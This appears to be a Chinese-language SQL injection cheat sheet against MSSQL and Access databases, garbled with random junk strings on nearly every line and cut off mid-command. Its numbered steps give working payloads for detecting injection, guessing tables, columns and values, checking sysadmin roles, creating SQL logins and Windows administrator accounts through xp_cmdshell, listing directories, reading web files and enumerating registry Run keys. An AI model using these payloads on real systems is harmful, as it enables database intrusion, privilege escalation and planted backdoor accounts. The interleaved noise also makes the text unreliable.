1.判断是否有注入;and 1=1 ;and 1=2 ;]{{)dst
2.初步判断是否是mssql ;and user>0 F%9cS
:
U@#?T
3.注入参数是字符'and [查询条件] and ''=' u1tq2"D8
P@2tR5<R
4.搜索时没过滤参数的'and [查询条件] and '%25'=' zIP[R):3&U
P`p6J8}4
5.判断数据库系统 vc )9Re$
Cca6L9%
;and (select count(*) from sysobjects)>0 mssql G4O,^ v;Q
C/CN
'
;and (select count(*) from msysobjects)>0 access kxygf9I!;
qx Wgt(Os
IY V-*/
|
3\7'm]
6.猜数据库 ;and (select Count(*) from [数据库名])>0 >vHH
qe[
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 VPWxHVf
aF,jJ}On
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 4g>1Gqv6
jo<>Hc{g>
9.(1)猜字段的ascii值(access) `E{;85bDH
anK[P'Y
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 (~=Qufy
'CS^2Z
(2)猜字段的ascii值(mssql) mr@_%U
N )'8o}E
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 *4-r`k|@>/
RlU;v2Kch
10.测试权限结构(mssql) B{;11u
mgo'MW\
hK:#+hg,
CFD*g\g<*
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- `oB' (
b;Hm\aK
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- :/>7$)+
>BJ2v=RA
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 3?.6K0L
^Yf3"D?&
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- w/qQ(]n8
xR0~S
3caI
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- yEE|e>
hm*Th
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 2~#ZO?jE6
]&&I|K_
;and 1=(select IS_MEMBER('db_owner'));-- 8o!
)WaX2uDA?
_u#/u2<
Qe7"Z
11.添加mssql和系统的帐户 <dq,y>
$/4Wod*l
;exec master.dbo.sp_addlogin username;-- h |s*i
;exec master.dbo.sp_password null,username,password;-- R'vdk<
3js)niT9u
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- E^oEG4X@
oN.Mra]D
;exec master.dbo.xp_cmdshell 'net user username password %2^['8t#NH
Bx\#`Y
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- }W - K
d8xk&za
;exec master.dbo.xp_cmdshell 'net user username password /add';-- :jZ*,d%1={
X4Pm)N`
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- C*"Rd
+i: E
9QX&7cs&[
~+nS)4(
12.(1)遍历目录 <'g0il
V->.|[J
;create table dirs(paths varchar(100), id int) o%vIkXw
N5:D8oWWXR
;insert dirs exec master.dbo.xp_dirtree 'c:\' nvU+XCx
Ytl:YzXCi
;and (select top 1 paths from dirs)>0 o@qN#Mg?>}
F@>w&A~K
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) =_#ye}E
OwNA N
#gxRTx
)v*v
(2)遍历目录 Ln"+nKr
K?z*3^^X;
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- u+%)JhIp
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 B ]|5?QP-
;y:#S^|?-z
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 d/0/$Bz}P
X !&"&n
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 NTv#{7q
wo,""=l
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 MuCQxzvkhf
`77;MGg*
v&t`5-e-A
OhA^UP01-
13.mssql中的存储过程 /ChJ~g "
jD&}}:Dj
xp_regenumvalues 注册表根键, 子键 k#l'ko/X
{q5hF5!`)
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 o`<h=+a\
9Q
SUCN_
xp_regread 根键,子键,键值名 S+` !%hJ
EG Q1li'B
;exec xp_regread d&GK